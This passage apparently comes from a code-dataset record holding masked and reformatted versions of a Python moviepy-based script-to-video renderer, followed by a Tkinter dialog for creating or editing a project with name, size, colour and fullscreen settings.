_write_timestamp(t, section_name):\n os.makedirs(os.path.dirname(out_filename), exist_ok=True)\n if not hasattr(_write_timestamp, 'f'):\n _write_timestamp.f = open('%s.txt' % out_filename, 'w', encoding=\n 'utf-8')\n _write_timestamp.f.write('%s (%s)\\n' % (section_name,\n _convert_to_readable_time(t)))\n _write_timestamp.f.flush()\n\n\n@core.api\ndef include(file):\n with open(file, 'r', encoding='utf-8') as f:\n s = f.read()\n cwd = os.getcwd()\n os.chdir(os.path.dirname(os.path.abspath(file)))\n _parse_text(s)\n os.chdir(cwd)\n\n\ndef _remove_unused_recordings(s):\n used_recordings = set()\n unused_recordings = []\n apis = {'record': lambda f, **kargs: used_recordings.add(f)}\n _parse_text(s, apis=apis)\n files = [f for f in glob.glob('record/*') if os.path.isfile(f)]\n files = [f.replace('\\\\', '/') for f in files]\n for f in files:\n if f not in used_recordings:\n unused_recordings.append(f)\n print2('Used : %d' % len(used_recordings), color='green')\n print2('Unused : %d' % len(unused_recordings), color='red')\n assert len(used_recordings) + len(unused_recordings) == len(files)\n print('Press y to clean up: ', end='', flush=True)\n if getch() == 'y':\n for f in unused_recordings:\n try:\n os.remove(f)\n except:\n print('WARNING: failed to remove: %s' % f)\n\n\ndef _parse_text(text, apis=core.apis, **kwargs):\n\n def find_next(text, needle, p):\n pos = text.find(needle, p)\n if pos < 0:\n pos = len(text)\n return pos\n text = re.sub('<!--[\\\\d\\\\D]*?-->', '', text)\n p = 0\n while p < len(text):\n if text[p:p + 2] == '{{':\n end = find_next(text, '}}', p)\n python_code = text[p + 2:end].strip()\n p = end + 2\n if ignore_undefined:\n try:\n exec(python_code, apis)\n except NameError:\n pass\n else:\n exec(python_code, apis)\n continue\n if text[p:p + 1] == '#':\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n _write_timestamp(coreapi.pos_dict['a'], line)\n p = end + 1\n continue\n match = re.match('---((?:[0-9]*[.])?[0-9]+)?\\n', text[p:])\n if match is not None:\n if match.group(1) is not None:\n coreapi.audio_gap(float(match.group(1)))\n else:\n coreapi.audio_gap(0.2)\n p += match.end(0) + 1\n continue\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n p = end + 1\n if line != '' and 'parse_line' in apis:\n apis['parse_line'](line)\n core.on_api_func(None)\n\n\ndef _show_stats(s):\n TIME_PER_CHAR = 0.1334154351395731\n total = 0\n\n def parse_line(line):\n nonlocal total\n total += len(line)\n _parse_text(s, apis={'parse_line': parse_line}, ignore_undefined=True)\n total_secs = TIME_PER_CHAR * total\n print('Estimated Time: %s' % format_time(total_secs))\n input()\n\n\ndef load_config():\n import yaml\n CONFIG_FILE = 'config.yaml'\n DEFAULT_CONFIG = {'fps': 30}\n if os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, 'r') as f:\n config = yaml.load(f.read(), Loader=yaml.FullLoader)\n else:\n with open(CONFIG_FILE, 'w', newline='\\n') as f:\n yaml.dump(DEFAULT_CONFIG, f, default_flow_style=False)\n config = DEFAULT_CONFIG\n coreapi.fps(config['fps'])\n\n\nif __name__ == '__main__':\n out_filename = 'tmp/out/' + get_time_str()\n parser = argparse.ArgumentParser()\n parser.add_argument('--stdin', default=False, action='store_true')\n parser.add_argument('--proj_dir', type=str, default=None)\n parser.add_argument('-i', '--input', type=str, default=None)\n parser.add_argument('-a', '--audio_only', action='store_true', default=\n False)\n parser.add_argument('--remove_unused_recordings', action='store_true',\n default=False)\n parser.add_argument('--show_stats', action='store_true', default=False)\n parser.add_argument('--preview', action='store_true', default=False)\n args = parser.parse_args()\n if args.proj_dir is not None:\n os.chdir(args.proj_dir)\n elif args.input:\n os.chdir(os.path.dirname(args.input))\n print('Project dir: %s' % os.getcwd())\n if os.path.exists('api.py'):\n sys.path.append(os.getcwd())\n mymodule = importlib.import_module('api')\n global_functions = inspect.getmembers(mymodule, inspect.isfunction)\n core.apis.update({k: v for k, v in global_functions})\n if args.audio_only:\n coreapi.audio_only()\n if args.stdin:\n s = sys.stdin.read()\n elif args.input:\n with open(args.input, 'r', encoding='utf-8') as f:\n s = f.read()\n else:\n raise Exception('Either --stdin or --input should be specified.')\n load_config()\n if args.preview:\n coreapi.preview()\n if args.remove_unused_recordings:\n ignore_undefined = True\n _remove_unused_recordings(s)\n elif args.show_stats:\n ignore_undefined = True\n _show_stats(s)\n else:\n _parse_text(s, apis=core.apis)\n _export_video(resolution=(1920, 1080), audio_only=args.audio_only)\n",
"step-5": "import argparse\nimport glob\nimport importlib\nimport inspect\nimport math\nimport os\nimport re\nimport subprocess\nimport sys\n\nimport moviepy.audio.fx.all as afx\nimport moviepy.video.fx.all as vfx\nimport numpy as np\nfrom _appmanager import get_executable\nfrom _shutil import format_time, get_time_str, getch, print2\nfrom moviepy.config import change_settings\nfrom moviepy.editor import *\nfrom open_with.open_with import open_with\n\nimport codeapi\nimport core\nimport coreapi\nimport datastruct\n\nSCRIPT_ROOT = os.path.dirname(os.path.abspath(__file__))\n\nignore_undefined = False\n\nif 1:\n change_settings({\"FFMPEG_BINARY\": get_executable(\"ffmpeg\")})\n\n\n# def _get_markers(file):\n# marker_file = file + \".marker.txt\"\n# if os.path.exists(marker_file):\n# with open(marker_file, \"r\") as f:\n# s = f.read()\n# return [float(x) for x in s.split()]\n# else:\n# return None\n\n\n# def _load_and_expand_img(f):\n# fg = Image.open(f).convert(\"RGBA\")\n# bg = Image.new(\"RGB\", (1920, 1080))\n# bg.paste(fg, ((bg.width - fg.width) // 2, (bg.height - fg.height) // 2), fg)\n# return np.array(bg)\n\n\ndef _update_mpy_clip(\n clip, subclip, speed, frame, norm, loop, duration, pos, scale, vol, **kwargs,\n):\n assert duration is not None\n\n # video clip operations / fx\n if subclip is not None:\n if isinstance(subclip, (int, float)):\n clip = clip.subclip(subclip).set_duration(duration)\n\n else:\n subclip_duration = subclip[1] - subclip[0]\n if duration > subclip_duration:\n c1 = clip.subclip(subclip[0], subclip[1])\n c2 = clip.to_ImageClip(subclip[1]).set_duration(\n duration - subclip_duration\n )\n clip = concatenate_videoclips([c1, c2])\n\n # HACK: workaround for a bug: 'CompositeAudioClip' object has no attribute 'fps'\n if clip.audio is not None:\n clip = clip.set_audio(clip.audio.set_fps(44100))\n else:\n clip = clip.subclip(subclip[0], subclip[1]).set_duration(duration)\n\n if speed is not None:\n clip = clip.fx(\n # pylint: disable=maybe-no-member\n vfx.speedx,\n speed,\n )\n\n if frame is not None:\n clip = clip.to_ImageClip(frame).set_duration(duration)\n\n # Loop or change duration\n if loop:\n clip = clip.fx(\n # pylint: disable=maybe-no-member\n vfx.loop\n )\n\n if subclip is None:\n clip = clip.set_duration(duration)\n\n if pos is not None:\n # (x, y) marks the center location of the of the clip instead of the top\n # left corner.\n if pos == \"center\":\n clip = clip.set_position((\"center\", \"center\"))\n elif isinstance(pos, (list, tuple)):\n pos = list(pos)\n half_size = [x // 2 for x in clip.size]\n for i in range(2):\n if isinstance(pos[i], (int, float)):\n pos[i] = pos[i] - half_size[i]\n pos[i] = int(coreapi.global_scale * pos[i])\n clip = clip.set_position(pos)\n else:\n clip = clip.set_position(pos)\n\n if scale[0] != 1.0 or scale[1] != 1.0:\n clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))\n\n return clip\n\n\ndef _update_clip_duration(track):\n def is_connected(prev_clip, cur_clip):\n return math.isclose(\n prev_clip.start + prev_clip.duration, cur_clip.start, rel_tol=1e-3,\n )\n\n prev_clip_info = None\n for clip_info in track:\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n prev_clip_info.duration = clip_info.start - prev_clip_info.start\n prev_clip_info.auto_extend = False\n assert prev_clip_info.duration > 0\n\n # Apply fadeout to previous clip if it's not connected with\n # current clip.\n if prev_clip_info.crossfade > 0 and not is_connected(\n prev_clip_info, clip_info\n ):\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n prev_clip_info = clip_info\n\n # Update last clip duration\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n duration = prev_clip_info.duration\n\n # Extend the last video clip to match the voice track\n if \"re\" in coreapi.pos_dict:\n duration = max(duration, coreapi.pos_dict[\"re\"] - clip_info.start)\n\n prev_clip_info.duration = duration\n prev_clip_info.auto_extend = False\n\n if prev_clip_info.crossfade > 0:\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n\ndef _export_video(*, resolution, audio_only):\n resolution = [int(x * coreapi.global_scale) for x in resolution]\n\n audio_clips = []\n\n # Update clip duration for each track\n for track in datastruct.video_tracks.values():\n _update_clip_duration(track)\n\n # TODO: post-process video track clips\n\n # Update MoviePy clip object in each track.\n video_clips = []\n for track_name, track in datastruct.video_tracks.items():\n for i, clip_info in enumerate(track):\n assert clip_info.mpy_clip is not None\n assert clip_info.duration is not None\n\n # Unlink audio clip from video clip (adjust audio duration)\n if clip_info.no_audio:\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n\n elif clip_info.mpy_clip.audio is not None:\n audio_clip = clip_info.mpy_clip.audio\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n\n # Audio timing\n # TODO: audio subclip\n if clip_info.subclip is not None:\n duration = clip_info.subclip[1] - clip_info.subclip[0]\n audio_clip = audio_clip.subclip(\n clip_info.subclip[0], clip_info.subclip[1]\n )\n else:\n duration = clip_info.duration\n duration = min(duration, audio_clip.duration)\n audio_clip = audio_clip.set_duration(duration)\n audio_clip = audio_clip.set_start(clip_info.start)\n\n # Adjust volume\n if clip_info.norm:\n audio_clip = audio_clip.fx(\n # pylint: disable=maybe-no-member\n afx.audio_normalize\n )\n if clip_info.vol is not None:\n if isinstance(clip_info.vol, (int, float)):\n audio_clip = audio_clip.fx(\n # pylint: disable=maybe-no-member\n afx.volumex,\n clip_info.vol,\n )\n else:\n audio_clip = _adjust_mpy_audio_clip_volume(\n audio_clip, clip_info.vol\n )\n\n audio_clips.append(audio_clip)\n\n # If the next clip has crossfade enabled\n crossfade_duration = track[i + 1].crossfade if (i < len(track) - 1) else 0\n if crossfade_duration:\n # clip_info.fadeout = crossfade_duration # Fadeout current clip\n clip_info.duration += crossfade_duration\n\n clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **vars(clip_info))\n\n # Deal with video fade in / out / crossfade\n if clip_info.fadein:\n assert isinstance(clip_info.fadein, (int, float))\n # TODO: crossfadein and crossfadeout is very slow in moviepy\n if track_name != \"vid\":\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(\n clip_info.fadein\n )\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(\n # pylint: disable=maybe-no-member\n vfx.fadein,\n clip_info.fadein,\n )\n\n elif (\n clip_info.crossfade > 0\n ): # crossfade and fadein should not happen at the same time\n video_clips.append(\n clip_info.mpy_clip.set_duration(clip_info.crossfade)\n .crossfadein(clip_info.crossfade)\n .set_start(clip_info.start)\n )\n\n clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.crossfade)\n clip_info.start += clip_info.crossfade\n\n if clip_info.fadeout:\n assert isinstance(clip_info.fadeout, (int, float))\n if track_name != \"vid\":\n # pylint: disable=maybe-no-member\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(\n clip_info.fadeout\n )\n else:\n\n clip_info.mpy_clip = clip_info.mpy_clip.fx(\n # pylint: disable=maybe-no-member\n vfx.fadeout,\n clip_info.fadeout,\n )\n\n video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))\n\n if len(video_clips) == 0:\n video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).set_duration(2))\n # raise Exception(\"no video clips??\")\n final_clip = CompositeVideoClip(video_clips, size=resolution)\n\n # Resize here is too late, does not speed up the video encoding at all.\n # final_clip = final_clip.resize(width=480)\n\n # Deal with audio clips\n for _, track in datastruct.audio_tracks.items():\n clips = []\n for clip_info in track.clips:\n if clip_info.loop:\n # HACK: reload the clip.\n #\n # still don't know why using loaded mpy_clip directly will cause\n # \"IndexError: index -200001 is out of bounds for axis 0 with\n # size 0\"...\n clip = AudioFileClip(clip_info.file, buffersize=400000)\n else:\n clip = clip_info.mpy_clip\n\n if clip_info.subclip is not None:\n clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])\n\n duration = clip_info.duration\n if duration is not None:\n if clip_info.loop:\n # pylint: disable=maybe-no-member\n clip = clip.fx(afx.audio_loop, duration=duration)\n else:\n duration = min(duration, clip.duration)\n if clip_info.subclip:\n duration = min(\n duration, clip_info.subclip[1] - clip_info.subclip[0]\n )\n clip = clip.set_duration(duration)\n\n if clip_info.start is not None:\n clip = clip.set_start(clip_info.start)\n\n # Adjust volume by keypoints\n if len(clip_info.vol_keypoints) > 0:\n clip = _adjust_mpy_audio_clip_volume(clip, clip_info.vol_keypoints)\n\n clips.append(clip)\n\n if len(clips) > 0:\n clip = CompositeAudioClip(clips)\n audio_clips.append(clip)\n\n if final_clip.audio:\n audio_clips.append(final_clip.audio)\n\n if len(audio_clips) > 0:\n final_audio_clip = CompositeAudioClip(audio_clips)\n\n # XXX: Workaround for exception: 'CompositeAudioClip' object has no attribute 'fps'.\n # See: https://github.com/Zulko/moviepy/issues/863\n # final_audio_clip.fps = 44100\n\n final_clip = final_clip.set_audio(final_audio_clip)\n\n # final_clip.show(10.5, interactive=True)\n\n os.makedirs(\"tmp/out\", exist_ok=True)\n\n if audio_only:\n final_audio_clip.fps = 44100\n final_audio_clip.write_audiofile(\"%s.mp3\" % out_filename)\n open_with(\"%s.mp3\" % out_filename, program_id=0)\n\n else:\n final_clip.write_videofile(\n \"%s.mp4\" % out_filename,\n temp_audiofile=\"%s.mp3\" % out_filename,\n remove_temp=False,\n codec=\"libx264\",\n threads=8,\n fps=coreapi.FPS,\n ffmpeg_params=[\"-crf\", \"19\"],\n )\n\n subprocess.Popen(\n [\"mpv\", \"--force-window\", \"--geometry=1920x1080\", f\"{out_filename}.mp4\"],\n close_fds=True,\n )\n\n\ndef _adjust_mpy_audio_clip_volume(clip, vol_keypoints):\n xp = []\n fp = []\n\n print(\"vol_keypoints:\", vol_keypoints)\n for (p, vol) in vol_keypoints:\n if isinstance(vol, (int, float)):\n xp.append(p)\n fp.append(vol)\n else:\n raise Exception(\"unsupported bgm parameter type:\" % type(vol))\n\n def volume_adjust(gf, t):\n factor = np.interp(t, xp, fp)\n factor = np.vstack([factor, factor]).T\n return factor * gf(t)\n\n return clip.fl(volume_adjust)\n\n\n# def _export_srt():\n# with open(\"out.srt\", \"w\", encoding=\"utf-8\") as f:\n# f.write(\"\\n\".join(_srt_lines))\n\n\ndef _convert_to_readable_time(seconds):\n seconds = int(seconds)\n seconds = seconds % (24 * 3600)\n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n\n if hour > 0:\n return \"%d:%02d:%02d\" % (hour, minutes, seconds)\n else:\n return \"%02d:%02d\" % (minutes, seconds)\n\n\ndef _write_timestamp(t, section_name):\n os.makedirs(os.path.dirname(out_filename), exist_ok=True)\n\n if not hasattr(_write_timestamp, \"f\"):\n _write_timestamp.f = open(\"%s.txt\" % out_filename, \"w\", encoding=\"utf-8\")\n\n _write_timestamp.f.write(\"%s (%s)\\n\" % (section_name, _convert_to_readable_time(t)))\n _write_timestamp.f.flush()\n\n\n@core.api\ndef include(file):\n with open(file, \"r\", encoding=\"utf-8\") as f:\n s = f.read()\n\n cwd = os.getcwd()\n os.chdir(os.path.dirname(os.path.abspath(file)))\n _parse_text(s)\n os.chdir(cwd)\n\n\ndef _remove_unused_recordings(s):\n used_recordings = set()\n unused_recordings = []\n\n apis = {\"record\": (lambda f, **kargs: used_recordings.add(f))}\n _parse_text(s, apis=apis)\n\n files = [f for f in glob.glob(\"record/*\") if os.path.isfile(f)]\n files = [f.replace(\"\\\\\", \"/\") for f in files]\n\n for f in files:\n if f not in used_recordings:\n unused_recordings.append(f)\n\n print2(\"Used : %d\" % len(used_recordings), color=\"green\")\n print2(\"Unused : %d\" % len(unused_recordings), color=\"red\")\n assert len(used_recordings) + len(unused_recordings) == len(files)\n print(\"Press y to clean up: \", end=\"\", flush=True)\n if getch() == \"y\":\n for f in unused_recordings:\n try:\n os.remove(f)\n except:\n print(\"WARNING: failed to remove: %s\" % f)\n\n\ndef _parse_text(text, apis=core.apis, **kwargs):\n def find_next(text, needle, p):\n pos = text.find(needle, p)\n if pos < 0:\n pos = len(text)\n return pos\n\n # Remove all comments\n text = re.sub(r\"<!--[\\d\\D]*?-->\", \"\", text)\n\n p = 0 # Current position\n while p < len(text):\n if text[p : p + 2] == \"{{\":\n end = find_next(text, \"}}\", p)\n python_code = text[p + 2 : end].strip()\n p = end + 2\n\n if ignore_undefined:\n try:\n exec(python_code, apis)\n except NameError: # API is not defined\n pass # simply ignore\n else:\n exec(python_code, apis)\n\n continue\n\n if text[p : p + 1] == \"#\":\n end = find_next(text, \"\\n\", p)\n\n line = text[p:end].strip()\n _write_timestamp(coreapi.pos_dict[\"a\"], line)\n\n p = end + 1\n continue\n\n match = re.match(\"---((?:[0-9]*[.])?[0-9]+)?\\n\", text[p:])\n if match is not None:\n if match.group(1) is not None:\n coreapi.audio_gap(float(match.group(1)))\n else:\n coreapi.audio_gap(0.2)\n p += match.end(0) + 1\n continue\n\n # Parse regular text\n end = find_next(text, \"\\n\", p)\n line = text[p:end].strip()\n p = end + 1\n\n if line != \"\" and \"parse_line\" in apis:\n apis[\"parse_line\"](line)\n\n # Call it at the end\n core.on_api_func(None)\n\n\ndef _show_stats(s):\n TIME_PER_CHAR = 0.1334154351395731\n\n total = 0\n\n def parse_line(line):\n nonlocal total\n total += len(line)\n\n _parse_text(s, apis={\"parse_line\": parse_line}, ignore_undefined=True)\n\n total_secs = TIME_PER_CHAR * total\n print(\"Estimated Time: %s\" % format_time(total_secs))\n\n input()\n\n\ndef load_config():\n import yaml\n\n CONFIG_FILE = \"config.yaml\"\n DEFAULT_CONFIG = {\"fps\": 30}\n\n if os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, \"r\") as f:\n config = yaml.load(f.read(), Loader=yaml.FullLoader)\n else:\n with open(CONFIG_FILE, \"w\", newline=\"\\n\") as f:\n yaml.dump(DEFAULT_CONFIG, f, default_flow_style=False)\n config = DEFAULT_CONFIG\n\n coreapi.fps(config[\"fps\"])\n\n\nif __name__ == \"__main__\":\n out_filename = \"tmp/out/\" + get_time_str()\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--stdin\", default=False, action=\"store_true\")\n parser.add_argument(\"--proj_dir\", type=str, default=None)\n parser.add_argument(\"-i\", \"--input\", type=str, default=None)\n parser.add_argument(\"-a\", \"--audio_only\", action=\"store_true\", default=False)\n parser.add_argument(\n \"--remove_unused_recordings\", action=\"store_true\", default=False\n )\n parser.add_argument(\"--show_stats\", action=\"store_true\", default=False)\n parser.add_argument(\"--preview\", action=\"store_true\", default=False)\n\n args = parser.parse_args()\n\n if args.proj_dir is not None:\n os.chdir(args.proj_dir)\n elif args.input:\n os.chdir(os.path.dirname(args.input))\n print(\"Project dir: %s\" % os.getcwd())\n\n # Load custom APIs (api.py) if exists\n if os.path.exists(\"api.py\"):\n sys.path.append(os.getcwd())\n mymodule = importlib.import_module(\"api\")\n global_functions = inspect.getmembers(mymodule, inspect.isfunction)\n core.apis.update({k: v for k, v in global_functions})\n\n # HACK\n if args.audio_only:\n coreapi.audio_only()\n\n # Read text\n if args.stdin:\n s = sys.stdin.read()\n\n elif args.input:\n with open(args.input, \"r\", encoding=\"utf-8\") as f:\n s = f.read()\n\n else:\n raise Exception(\"Either --stdin or --input should be specified.\")\n\n load_config()\n\n if args.preview:\n coreapi.preview()\n\n if args.remove_unused_recordings:\n ignore_undefined = True\n _remove_unused_recordings(s)\n elif args.show_stats:\n ignore_undefined = True\n _show_stats(s)\n else:\n _parse_text(s, apis=core.apis)\n _export_video(resolution=(1920, 1080), audio_only=args.audio_only)\n",
"step-ids": [
8,
9,
10,
12,
15
]
}
|
[
8,
9,
10,
12,
15
] |
<|reserved_special_token_0|>
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
<|reserved_special_token_0|>
def apply(self):
"""
called when ok button is pressed
"""
self.output = {'name': self.form.values[0], 'width': self.form.
values[1], 'height': self.form.values[2], 'bgcolor': self.form.
values[3], 'fullscreen': self.form.values[4]}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self, title=
'Wrong data', message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self, title=
'Project title', message='Invalid project name')
return False
return True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
def body(self, master):
initial_values = ['', 640, 480, '#dadada', False]
if self._dict:
initial_values = [self._dict.get('name'), self._dict.get(
'width'), self._dict.get('height'), self._dict.get(
'bgcolor'), self._dict.get('fullscreen')]
self.form = boring.form.FormFrame(master, FORMSTRING,
initial_values=initial_values, title='%s Project' % ('Edit' if
self._dict else 'New'))
self.form.grid(pady=10, padx=10)
return self.form.inputs[0]
def apply(self):
"""
called when ok button is pressed
"""
self.output = {'name': self.form.values[0], 'width': self.form.
values[1], 'height': self.form.values[2], 'bgcolor': self.form.
values[3], 'fullscreen': self.form.values[4]}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self, title=
'Wrong data', message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self, title=
'Project title', message='Invalid project name')
return False
return True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
FORMSTRING = """
Project name@string
Width@int|Height@int
Background color@color
Fullscreen@check
"""
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
def body(self, master):
initial_values = ['', 640, 480, '#dadada', False]
if self._dict:
initial_values = [self._dict.get('name'), self._dict.get(
'width'), self._dict.get('height'), self._dict.get(
'bgcolor'), self._dict.get('fullscreen')]
self.form = boring.form.FormFrame(master, FORMSTRING,
initial_values=initial_values, title='%s Project' % ('Edit' if
self._dict else 'New'))
self.form.grid(pady=10, padx=10)
return self.form.inputs[0]
def apply(self):
"""
called when ok button is pressed
"""
self.output = {'name': self.form.values[0], 'width': self.form.
values[1], 'height': self.form.values[2], 'bgcolor': self.form.
values[3], 'fullscreen': self.form.values[4]}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self, title=
'Wrong data', message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self, title=
'Project title', message='Invalid project name')
return False
return True
<|reserved_special_token_1|>
import boring.dialog
import boring.form
FORMSTRING = """
Project name@string
Width@int|Height@int
Background color@color
Fullscreen@check
"""
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
def body(self, master):
initial_values = ['', 640, 480, '#dadada', False]
if self._dict:
initial_values = [self._dict.get('name'), self._dict.get(
'width'), self._dict.get('height'), self._dict.get(
'bgcolor'), self._dict.get('fullscreen')]
self.form = boring.form.FormFrame(master, FORMSTRING,
initial_values=initial_values, title='%s Project' % ('Edit' if
self._dict else 'New'))
self.form.grid(pady=10, padx=10)
return self.form.inputs[0]
def apply(self):
"""
called when ok button is pressed
"""
self.output = {'name': self.form.values[0], 'width': self.form.
values[1], 'height': self.form.values[2], 'bgcolor': self.form.
values[3], 'fullscreen': self.form.values[4]}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self, title=
'Wrong data', message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self, title=
'Project title', message='Invalid project name')
return False
return True
<|reserved_special_token_1|>
import boring.dialog
import boring.form
FORMSTRING = '''
Project name@string
Width@int|Height@int
Background color@color
Fullscreen@check
'''
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
def body(self, master):
initial_values = [
'',
640, 480,
'#dadada',
False
]
if self._dict:
initial_values = [
self._dict.get('name'),
self._dict.get('width'), self._dict.get('height'),
self._dict.get('bgcolor'),
self._dict.get('fullscreen')
]
self.form = boring.form.FormFrame(master, FORMSTRING, initial_values=initial_values, title='%s Project' % ('Edit' if self._dict else 'New'))
self.form.grid(pady=10, padx=10)
return self.form.inputs[0]
def apply(self):
'''
called when ok button is pressed
'''
self.output = {
'name': self.form.values[0],
'width': self.form.values[1],
'height': self.form.values[2],
'bgcolor': self.form.values[3],
'fullscreen': self.form.values[4]
}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self,
title='Wrong data',
message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self,
title='Project title',
message='Invalid project name')
return False
return True
|
flexible
|
{
"blob_id": "76420ec1b37d4b9b85f35764a7f8a0e1f19a15dd",
"index": 5745,
"step-1": "<mask token>\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n <mask token>\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-2": "<mask token>\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-3": "<mask token>\nFORMSTRING = \"\"\"\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n\"\"\"\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-4": "import boring.dialog\nimport boring.form\nFORMSTRING = \"\"\"\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n\"\"\"\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def 